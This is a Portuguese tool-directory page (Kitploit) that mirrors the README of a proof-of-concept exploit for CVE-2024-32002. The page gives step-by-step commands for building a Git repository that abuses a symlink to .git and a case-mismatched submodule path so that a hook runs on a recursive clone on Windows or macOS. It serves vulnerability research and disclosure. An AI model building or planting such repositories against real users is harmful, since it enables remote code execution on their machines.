Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2024-32002-poc-rce — Prova de conceito de exploit para CVE-2024-32002, demonstrando execução remota de código via submódulos Git maliciosos em sistemas de arquivos insensíveis a maiúsculas/minúsculas. | Kitploit
Ferramentas/GitHubGitHub/jakob-pennington/cve-2024-32002-poc-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubjakob-pennington/cve-2024-32002-poc-rce

cve-2024-32002-poc-rce

Prova de conceito de exploit para CVE-2024-32002, demonstrando execução remota de código via submódulos Git maliciosos em sistemas de arquivos insensíveis a maiúsculas/minúsculas.

Ver Repositório
13há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-32002 POC de RCE

Uma POC para CVE-2024-32002 demonstrando Execução Remota de Código (RCE).

Veja cve-2024-32002-poc-rce para o repositório de submódulo relacionado.

O que este repositório contém

  • Um link simbólico com um nome arbitrário que aponta para o diretório .git.
  • Um arquivo .gitmodules que define o submódulo malicioso.

Como recriar este repositório

Este repositório foi criado no Linux (WSL2, para ser específico). Isso é importante, o repositório malicioso só pode ser criado em um sistema de arquivos sensível a maiúsculas/minúsculas.

  1. Crie um link simbólico, usando apenas caracteres minúsculos
root@kitploit:~
ln -s .git submodule

Notas:

  • O link simbólico deve apontar para a pasta .git, pois é onde queremos escrever arquivos
  • O nome do link simbólico (submodule) é arbitrário, mas deve começar com um caractere minúsculo
  • Isso é importante, porque caracteres minúsculos são ordenados antes de caracteres maiúsculos. Quando a máquina que está clonando fica confusa sobre onde escrever os arquivos do submódulo, queremos que ela escolha o link simbólico e não um diretório normal.
  1. Adicione o submódulo malicioso, observando a diferença de maiúsculas/minúsculas no nome do diretório do submódulo
root@kitploit:~
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce

Notas:

  • O nome do submódulo ("rce/notexists") é importante, ele entrará em ação ao colocar nosso hook no submódulo.
    • "rce" deve corresponder ao último segmento do caminho do submódulo.
    • "notexists" deve corresponder ao nome do diretório que contém hooks/post-checkout no diretório do submódulo. Veja cve-2024-32002-poc-rce.
  • A estrutura do caminho do submódulo ("Submodule/modules/rce") também importa:
    • O primeiro segmento do caminho do submódulo ("Submodule") deve corresponder ao nome do link simbólico acima, diferindo apenas em maiúsculas/minúsculas.
    • O segundo segmento ("modules") corresponde ao nome do caminho dentro do diretório .git que rastreia o status do git para submódulos.
    • O terceiro segmento ("rce") deve corresponder ao primeiro segmento do nome do submódulo acima.

Como executar a POC

Esta vulnerabilidade afeta apenas Windows e MacOS, pois ambos possuem sistemas de arquivos que não diferenciam maiúsculas de minúsculas.

  1. Verifique se você tem uma versão vulnerável do git. Veja o aviso do GitHub para versões afetadas.
root@kitploit:~
git --version
  1. Pense se você conscientemente deseja executar um comando que poderia alcançar RCE... Este repositório é benigno, mas tem certeza?
  2. Execute o seguinte comando:
root@kitploit:~
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git
  1. Se a POC funcionou, você deve ser capaz de fazer alguns cálculos!
Baixar ferramenta